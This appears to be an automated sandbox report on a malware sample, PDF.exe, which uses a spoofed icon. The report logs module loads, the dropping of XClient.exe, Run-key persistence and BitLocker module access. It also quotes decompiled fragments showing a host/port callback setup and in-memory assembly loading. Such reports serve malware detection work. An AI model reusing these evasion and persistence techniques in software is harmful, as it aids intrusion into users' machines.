                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\Desktop\PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                    Source: PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                                    Data Obfuscation

                                    barindex
                                    .NET source code contains method to dynamically call methods (often used by packers)
                                    Source: PDF.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: PDF.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: XClient.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: XClient.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: 0.2.PDF.exe.128e1a78.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: 0.2.PDF.exe.128e1a78.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                    .NET source code contains potential unpacker
                                    Source: PDF.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                                    Source: PDF.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                                    Source: PDF.exe, Messages.cs.Net Code: Memory
                                    Source: XClient.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                                    Source: XClient.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                                    Source: XClient.exe.0.dr, Messages.cs.Net Code: Memory
                                    Source: 0.2.PDF.exe.128e1a78.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                                    Source: 0.2.PDF.exe.128e1a78.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                                    Source: 0.2.PDF.exe.128e1a78.0.raw.unpack, Messages.cs.Net Code: Memory
                                    Source: C:\Users\user\Desktop\PDF.exeCode function: 0_2_00007FFD9B7C00AD pushad ; iretd 0_2_00007FFD9B7C00C1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B6BD2A5 pushad ; iretd 1_2_00007FFD9B6BD2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7D00AD pushad ; iretd 1_2_00007FFD9B7D00C1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8A2316 push 8B485F94h; iretd 1_2_00007FFD9B8A231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B6ED2A5 pushad ; iretd 4_2_00007FFD9B6ED2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8019DA pushad ; ret 4_2_00007FFD9B8019E9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8000AD pushad ; iretd 4_2_00007FFD9B8000C1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8D2316 push 8B485F91h; iretd 4_2_00007FFD9B8D231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B6DD2A5 pushad ; iretd 7_2_00007FFD9B6DD2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B7F00AD pushad ; iretd 7_2_00007FFD9B7F00C1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B8C2316 push 8B485F92h; iretd 7_2_00007FFD9B8C231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B8C1AC8 push es; retf 7_2_00007FFD9B8C1AC9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B6ED2A5 pushad ; iretd 11_2_00007FFD9B6ED2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B800D03 push eax; retf 11_2_00007FFD9B800D4D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B8000AD pushad ; iretd 11_2_00007FFD9B8000C1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B8D2316 push 8B485F91h; iretd 11_2_00007FFD9B8D231B
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 14_2_00007FFD9B7D00AD pushad ; iretd 14_2_00007FFD9B7D00C1
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeCode function: 15_2_00007FFD9B7D00AD pushad ; iretd 15_2_00007FFD9B7D00C1
                                    Source: C:\Users\user\Desktop\PDF.exeFile created: C:\Users\user\AppData\Local\Temp\XClient.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\PDF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClientJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClientJump to behavior

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Icon mismatch, binary includes an icon from a different legit application in order to fool users
                                    Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (2112).png
                                    Loading BitLocker PowerShell Module
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
